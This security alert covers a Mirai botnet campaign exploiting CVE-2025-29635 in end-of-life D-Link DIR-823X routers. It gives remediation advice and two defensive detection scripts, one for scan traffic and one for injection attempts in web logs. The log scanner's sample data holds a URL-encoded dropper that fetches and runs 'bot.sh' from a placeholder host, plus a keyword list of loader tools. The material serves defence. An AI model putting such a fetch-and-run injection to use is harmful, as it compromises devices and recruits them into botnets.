HackWatch
High risk vulnerability alert

New Mirai Campaign Exploits RCE Vulnerability in End-of-Life D-Link DIR-823X Routers

Vulnerability coverage focused on affected versions, exploitability and patch or mitigation decisions.

Exploitability matters here. Check exposed versions, prioritize mitigations and patch first where remote access or privilege escalation is possible.
By: Marcin Pocztowski, Infrastructure Security Editor (Infrastructure and Vulnerability Response)

Published: Apr 22, 2026

Updated: May 01, 2026

Incident status: Resolved or patched

Corroborating sources: 2

Technical review credentials: Security+ evidence | RHCSA evidence | JNCIS-SEC evidence

Trust note: This alert is maintained under HackWatch's editorial policy, with visible source records, a named responsible editor and a correction channel for disputed facts.

The published article is checked against public sources before publication, and material corrections are reflected in the article update date.

Technical reviewer note: Marcin Pocztowski reviewed this alert on May 01, 2026 from an administrator's point of view, checking CVE-2025-29635 against vendor, CVE and advisory context before accepting the risk language. His remediation check is practical: confirm the affected model and firmware first, restrict reachable management surfaces as he would on Juniper, Cisco or Mikrotik routers, then patch or apply vendor mitigations only where the 2 corroborating sources support that scope.

Review our editorial policy or send corrections to [email protected].

Resolved or patched. Source coverage indicates that formal remediation guidance has been published. For this end-of-life model that guidance is retirement and replacement rather than a firmware fix, so verify that affected devices have been taken out of service in your environment.

A fresh Mirai botnet campaign is actively exploiting CVE-2025-29635, a critical remote code execution flaw in D-Link DIR-823X routers, a model that has reached end-of-life. Compromised routers are recruited into the botnet and used for distributed denial-of-service (DDoS) attacks, and because the device is no longer supported, no firmware fix is expected.

# New Mirai Campaign Exploits RCE Vulnerability in End-of-Life D-Link DIR-823X Routers

What happened

In April 2026, cybersecurity researchers identified a new Mirai-based malware campaign exploiting CVE-2025-29635, a remote code execution (RCE) vulnerability in D-Link DIR-823X routers. The flaw lets an unauthenticated attacker inject and execute arbitrary shell commands on the device, and it has been weaponized to recruit these routers into a Mirai botnet. The campaign targets a model that has reached end-of-life (EoL) status, meaning it no longer receives security updates or patches from the vendor.

Exploitation gives the attacker control of the router, which then runs as a bot that can be used to launch large-scale distributed denial-of-service (DDoS) attacks or other malicious activity. Because the DIR-823X is deployed in home and small business networks, typically as the internet-facing edge device, every compromised unit both feeds the botnet and sits in front of the network behind it.

Confirmed facts

  • The vulnerability exploited is CVE-2025-29635, a command injection flaw in the D-Link DIR-823X router firmware.
  • The flaw allows unauthenticated remote attackers to execute arbitrary shell commands on vulnerable devices.
  • D-Link officially declared the DIR-823X model end-of-life in late 2025, ceasing firmware updates and security patches.
  • The new Mirai campaign has been observed actively scanning for and compromising vulnerable routers worldwide.
  • Compromised devices are incorporated into a Mirai botnet used primarily for DDoS attacks.
  • The campaign leverages automated exploitation scripts to mass-infect devices rapidly.
  • Multiple outlets, including BleepingComputer and Help Net Security, have reported the ongoing exploitation activity.

Who is affected

Owners and operators of D-Link DIR-823X routers that are still in service after the model reached EoL are at high risk. This includes:

  • Residential users relying on DIR-823X routers for home internet connectivity.
  • Small businesses using the device for network routing and firewall functions.
  • Internet service providers (ISPs) or managed service providers (MSPs) that deploy these routers to customers.

Because the vulnerability is exploitable without authentication, any DIR-823X router whose management interface can be reached from the internet, or from an untrusted network segment, is susceptible. Users unaware of the device's EoL status are particularly exposed, since they may be waiting for a firmware update that will never be released.

What to do now

If you own or manage a D-Link DIR-823X router, take the following immediate actions:

  1. Confirm the model and firmware version: Log in to the router's admin interface and record the exact model and firmware build so you know whether this alert applies to you. Do not expect a fix to appear: the device is EoL and D-Link will not release firmware addressing CVE-2025-29635.
  2. Take the device off the internet if you can: Until it is replaced, disconnect the router's WAN link or swap in a supported device, so the vulnerable interface cannot be reached from outside.
  3. Replace the router: The only durable mitigation is to retire the DIR-823X and move to a model that still receives security updates.
  4. Reboot and factory reset: Mirai-family bots generally run only in memory, so a power cycle clears the running malware, but an exposed device is typically reinfected within minutes and the reset does nothing about the underlying vulnerability. Reset only as part of taking the device offline or replacing it.
  5. Monitor network traffic: Watch for the router's WAN address opening large numbers of outbound connections to many different hosts on the same port (Mirai bots scan telnet on TCP/23 and TCP/2323 and probe common HTTP ports), for the router itself making unexpected DNS or HTTP requests, and for sustained upstream bandwidth use while the LAN is idle.
  6. Change default credentials: Do this if the device stays in service, but understand that it does not block CVE-2025-29635, which needs no credentials; it only closes the separate password-guessing path that Mirai also uses.
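Step 5 is the one that needs tooling. The script below is an added example for this alert, not code from the page's sources or from D-Link: it reads per-flow records (NetFlow/IPFIX, conntrack, or a firewall's connection log) for traffic leaving the router's WAN address, in a simple constructed text format, and flags any source that sweeps many hosts on one port with almost no replies, the signature of a Mirai scanner. The port list, thresholds, window size and sample flows are all assumptions.

```python
"""Flag hosts that behave like Mirai scanners in exported flow records.

Added example for this alert, not code from the page's sources or from D-Link.
It assumes you can export flow records for traffic leaving the router's WAN
address and write them in the space-separated format constructed below.
"""
from collections import defaultdict

# Ports a Mirai-family scanner sprays: telnet (23, 2323) is the classic target;
# exploit-driven variants also probe common HTTP management ports. (Assumed list.)
SCAN_PORTS = {23, 2323, 80, 8080, 8443}
MIN_TARGETS = 20        # distinct destinations per port per window (assumed threshold)
WINDOW_SECONDS = 60     # bucket size for fan-out counting (assumed)
MAX_ANSWERED = 0.1      # scans are mostly unanswered SYNs: <=10% of flows get reply bytes

# Constructed sample, NOT real telemetry. One flow per line:
#   <epoch> <src_ip> <dst_ip> <dst_port> <packets_out> <bytes_in>
# 203.0.113.10 plays an infected router sweeping telnet; 203.0.113.11 is a
# normal client with a few HTTPS sessions and one legitimate telnet login.
SAMPLE_FLOWS = "\n".join(
    [f"1745323200 203.0.113.10 198.51.100.{i} 23 1 0" for i in range(1, 31)]
    + [f"1745323205 203.0.113.10 192.0.2.{i} 2323 1 0" for i in range(1, 26)]
    + [f"1745323210 203.0.113.11 198.51.100.{i} 443 40 15000" for i in range(1, 6)]
    + ["1745323215 203.0.113.11 198.51.100.7 23 60 3200"]
)


def parse_flows(text):
    """Parse the constructed flow format into dicts; skips blanks and '#' comments."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport, pkts, bytes_in = line.split()
        flows.append({
            "ts": int(ts), "src": src, "dst": dst,
            "dport": int(dport), "pkts": int(pkts), "bytes_in": int(bytes_in),
        })
    return flows


def find_scanners(flows, ports=SCAN_PORTS, min_targets=MIN_TARGETS,
                  window=WINDOW_SECONDS, max_answered=MAX_ANSWERED):
    """Return one finding per (src, port, window) whose fan-out looks like a scan.

    A scan is many distinct destinations on one port inside a short window,
    with almost none of the flows carrying reply bytes (targets do not listen
    or drop the SYN). A busy but legitimate client fails one of the two tests:
    few distinct hosts per port, or real two-way data.
    """
    buckets = defaultdict(lambda: {"dsts": set(), "flows": 0, "answered": 0})
    for f in flows:
        if f["dport"] not in ports:
            continue
        key = (f["src"], f["dport"], f["ts"] // window)
        b = buckets[key]
        b["dsts"].add(f["dst"])
        b["flows"] += 1
        if f["bytes_in"] > 0:
            b["answered"] += 1

    findings = []
    for (src, dport, bucket), b in sorted(buckets.items()):
        if len(b["dsts"]) < min_targets:
            continue
        answered_ratio = b["answered"] / b["flows"]
        if answered_ratio > max_answered:
            continue
        findings.append({
            "src": src,
            "dport": dport,
            "window_start": bucket * window,
            "distinct_targets": len(b["dsts"]),
            "answered_ratio": round(answered_ratio, 2),
        })
    return findings


if __name__ == "__main__":
    for hit in find_scanners(parse_flows(SAMPLE_FLOWS)):
        print(f"{hit['src']} swept {hit['distinct_targets']} hosts on tcp/{hit['dport']} "
              f"from {hit['window_start']} (answered {hit['answered_ratio']:.0%})")
```

Run against real records, the source to look for is the router's own WAN address: a bot scanning from the router shows up as that address, not as a LAN client, so a flow export taken on the LAN side will miss it. The answered-ratio test is what keeps a legitimate but busy host (a backup job, a browser with many tabs) out of the findings.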

How to secure yourself

Beyond immediate remediation, users should adopt broader security practices to protect their home or business networks:

  • Keep network device firmware current, and replace devices that leave support: Install updates as they are released, and treat an end-of-life notice as the point at which the device must be retired, since no further fixes will come.
  • Disable remote administration: Turn off WAN-side management unless it is genuinely needed; where it is, restrict it to known source addresses or reach it over a VPN rather than exposing the admin interface to the internet.
  • Segment your network: Use VLANs or guest networks to isolate IoT devices and reduce attack surfaces.
  • Implement strong password policies: Avoid default or weak passwords on all network devices.
  • Use network monitoring tools: Employ intrusion detection systems (IDS) or network analyzers to identify suspicious behavior.
  • Educate users: Ensure everyone with access understands phishing, social engineering, and safe internet practices.

FAQ

What is CVE-2025-29635?

CVE-2025-29635 is a critical command injection vulnerability in D-Link DIR-823X router firmware. An unauthenticated remote attacker can inject and execute arbitrary shell commands on the device, which amounts to full remote code execution on the router.

How does the Mirai malware exploit this vulnerability?

The campaign's scanner sends crafted requests to exposed routers with shell commands embedded in the vulnerable parameter. In the usual exploit-driven Mirai pattern, the injected commands fetch and run the bot binary, which then joins the botnet and starts scanning for further victims.
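To make that concrete at the edge, the script below is an added example, not code from the page's sources or from D-Link, and it contains no real exploit: the page does not name the vulnerable endpoint or parameter, so the /example path in the constructed log lines is a placeholder. It scans web-server access log lines (Apache/nginx "combined" format) for the two things an exploit-driven Mirai infection leaves behind in a request: shell metacharacters inside a parameter value, and the loader commands (wget/curl/tftp, /tmp, chmod) that fetch and run the bot. The keyword list and severity rules are assumptions.

```python
"""Spot command-injection and Mirai-style dropper payloads in HTTP request logs.

Added example for this alert, not code from the page's sources or from D-Link.
Log lines are constructed in Apache/nginx "combined" format; /example is a
placeholder path, not the DIR-823X endpoint (which this page does not name).
"""
import re
from urllib.parse import unquote_plus

# Constructed sample. Line 1 is a benign diagnostic call; line 3 is the same
# call with a payload that fetches and runs a bot binary, the usual shape of an
# exploit-driven Mirai infection (download into /tmp, chmod, execute). Line 2
# is a POST whose body is not in the access log at all (see note below).
SAMPLE_LOG = """\
203.0.113.77 - - [22/Apr/2026:10:14:03 +0000] "GET /example?host=8.8.8.8 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.88 - - [22/Apr/2026:10:14:09 +0000] "POST /example HTTP/1.1" 200 12 "-" "curl/8.4.0"
203.0.113.88 - - [22/Apr/2026:10:14:10 +0000] "GET /example?host=8.8.8.8%3Bcd%20%2Ftmp%3Bwget%20http%3A%2F%2F192.0.2.9%2Fbot.sh%3Bchmod%20777%20bot.sh%3B.%2Fbot.sh HTTP/1.1" 200 0 "-" "Hello, world"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Shell metacharacters that turn a parameter value into a second command.
METACHARS = re.compile(r"[;|&`]|\$\(|\n")
# Tooling a Mirai loader typically relies on once it has command execution
# (assumed list; tune for your environment).
STAGER_WORDS = re.compile(
    r"\b(?:wget|curl|tftp|busybox|chmod)\b|/tmp\b|/dev/null", re.IGNORECASE
)


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def analyze_request(target):
    """Classify one request target. Returns (severity, indicators, decoded) or None."""
    # Decode twice: a single decode misses %253B-style double-encoded payloads.
    decoded = unquote_plus(unquote_plus(target))
    metachars = sorted(set(METACHARS.findall(decoded)))
    stagers = sorted({w.lower() for w in STAGER_WORDS.findall(decoded)})
    if metachars and stagers:
        severity = "high"      # injection syntax plus a dropper: treat as exploitation
    elif metachars:
        severity = "medium"    # injection syntax alone, e.g. a probe such as ";id"
    elif stagers:
        severity = "low"       # loader keywords in an otherwise plain value
    else:
        return None
    return severity, stagers + metachars, decoded


def scan_log(text):
    """Run analyze_request over every parseable line and collect the findings."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = analyze_request(rec["target"])
        if verdict is None:
            continue
        severity, indicators, decoded = verdict
        findings.append({
            "ip": rec["ip"], "time": rec["time"], "method": rec["method"],
            "severity": severity, "indicators": indicators, "decoded": decoded,
        })
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"[{hit['severity']}] {hit['ip']} {hit['method']} {hit['decoded']}  "
              f"indicators={hit['indicators']}")
```

This only sees payloads carried in the request line. The second sample line shows the limit: a POST body is not written to an access log, so injection delivered in form fields needs a WAF, an IDS with HTTP body inspection, or a packet capture in front of the device. Pointing the script at the logs of any HTTP-facing device or honeypot on the same address ranges as your routers is a cheap way to learn whether the campaign's scanner is already knocking.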

Am I affected if I have a different D-Link router model?

This specific campaign targets DIR-823X routers. However, other models may have separate vulnerabilities. Always check your device’s security advisories.

Can a factory reset remove the Mirai malware?

A reboot or factory reset removes the running bot, since Mirai-family malware usually does not persist across a power cycle, but it does not fix the vulnerability, so an internet-exposed device is re-infected quickly, often within minutes.

Is there a patch available for this vulnerability?

No, because the DIR-823X model is end-of-life, D-Link has ceased firmware updates, so no official patch exists.

What are the risks of having a compromised router?

Compromised routers can be used in botnets for DDoS attacks, data interception, network infiltration, and further malware distribution.

How can I check if my router is part of a botnet?

Watch for the router itself opening many outbound connections to different hosts on the same port (telnet on TCP/23 and TCP/2323 is the classic Mirai scan), for unexpected DNS or HTTP requests from the router's address, and for bandwidth spikes while your own devices are idle. Flow exports or an IDS at the network edge can flag this behaviour.

Should I replace my DIR-823X router immediately?

Yes, replacing the device with a supported model is the most effective way to eliminate this risk.

Can antivirus software protect my router from this attack?

Antivirus software typically does not protect routers. Network-level security and firmware updates are essential.

What should I do if I suspect my router is compromised?

Disconnect it from the internet, perform a factory reset, change all passwords, and replace the device as soon as possible.

Why this matters

This campaign underscores the critical risks posed by end-of-life network devices that no longer receive security patches. The exploitation of CVE-2025-29635 by Mirai highlights how attackers rapidly weaponize known vulnerabilities to build botnets capable of disrupting internet services worldwide. For users and organizations, continuing to operate unsupported routers exposes them to severe security threats, including network compromise, data theft, and participation in malicious cyber activities without their knowledge.

Proactive device management, timely hardware upgrades, and vigilant network monitoring are essential defenses against such evolving threats. The ongoing Mirai campaign serves as a stark reminder that neglecting device lifecycle management can have far-reaching consequences for individual and collective cybersecurity.

Sources and corroboration

This article is based on a report published by BleepingComputer on April 22, 2026 and corroborating coverage from Help Net Security. Both describe active exploitation of CVE-2025-29635 and the growth of a Mirai botnet built from D-Link DIR-823X routers.

  • https://www.bleepingcomputer.com/news/security/new-mirai-campaign-exploits-rce-flaw-in-eol-d-link-routers/

---

Tags: ["Mirai malware", "D-Link DIR-823X", "CVE-2025-29635", "router vulnerability", "botnet", "remote code execution", "IoT security", "end-of-life devices", "DDoS attacks", "network security"]


Sources used for this article

helpnetsecurity.com, BleepingComputer

Reviewer profile: Marcin Pocztowski, Infrastructure Security Editor at HackWatch.io

Marcin Pocztowski is the owner of MMPS and an infrastructure security editor for HackWatch. His public technical record spans 20 years, from Security+ evidence dated January 2006 through Juniper, Cisco and RHCSA records, and he reviews server, network and vulnerability-response coverage for source accuracy and practical remediation.

Infrastructure Security Editor: technical-density, source-existence and remediation-logic review for infrastructure and vulnerability coverage.

Coverage focus: Server and network hardening, vulnerability response, patch prioritization and infrastructure security review

Editorial disclosure: This profile is tied to Marcin's LinkedIn, X profile and documented editorial work on HackWatch. Historical certificates are treated as background evidence only, not as current active credentials.

Marcin leads this malware alerts coverage lane at HackWatch. This article is maintained as part of the ongoing editorial watch around "New Mirai Campaign Exploits RCE Vulnerability in End-of-Life D-Link DIR-823X Routers".


Coverage areas: server and network infrastructure administration; known exploited vulnerabilities and patch prioritization; CVSS v4.0 and CISA KEV triage.